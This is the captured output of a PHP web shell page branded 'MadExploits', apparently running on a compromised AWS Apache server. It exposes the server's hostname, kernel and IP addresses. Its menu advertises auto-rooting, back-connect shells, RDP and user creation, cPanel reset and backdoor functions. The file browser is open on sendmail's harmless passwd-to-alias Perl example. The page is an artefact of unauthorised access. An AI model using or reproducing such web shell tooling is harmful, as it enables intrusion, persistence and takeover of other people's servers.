Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.219.68.172
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
sendmail /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
amavis
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
dhcp
[ DIR ]
drwxr-xr-x
ldap
[ DIR ]
drwxr-xr-x
logcheck
[ DIR ]
drwxr-xr-x
milter
[ DIR ]
drwxr-xr-x
network
[ DIR ]
drwxr-xr-x
pam.d
[ DIR ]
drwxr-xr-x
ppp
[ DIR ]
drwxr-xr-x
resolvconf
[ DIR ]
drwxr-xr-x
sasl
[ DIR ]
drwxr-xr-x
tls
[ DIR ]
drwxr-xr-x
passwd-to-alias
871
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : passwd-to-alias
#!/usr/bin/perl # # Convert GECOS information in password files to alias syntax. # # Contributed by Kari E. Hurtta <Kari.Hurtta@ozone.fmi.fi> # print "# Generated from passwd by $0\n"; $wordpat = '([a-zA-Z]+?[a-zA-Z0-9-]*)?[a-zA-Z0-9]'; # 'DB2' while (@a = getpwent) { ($name,$passwd,$uid,$gid,$quota,$comment,$gcos,$dir,$shell) = @a; ($fullname = $gcos) =~ s/,.*$//; if (!-d $dir || !-x $shell || $shell =~ m!/bin/(false|true)$!) { print "$name: root\n"; # handle pseudo user } $fullname =~ s/\.*[ _]+\.*/./g; $fullname =~ tr [�������] [aaeouAAOU]; # <hakan@af.lu.se> 1997-06-15 next if (!$fullname || lc($fullname) eq $name); # avoid nonsense if ($fullname =~ /^$wordpat(\.$wordpat)*$/o) { # Ulrich Windl print "$fullname: $name\n"; } else { print "# $fullname: $name\n"; # avoid strange names } }; endpwent;
Close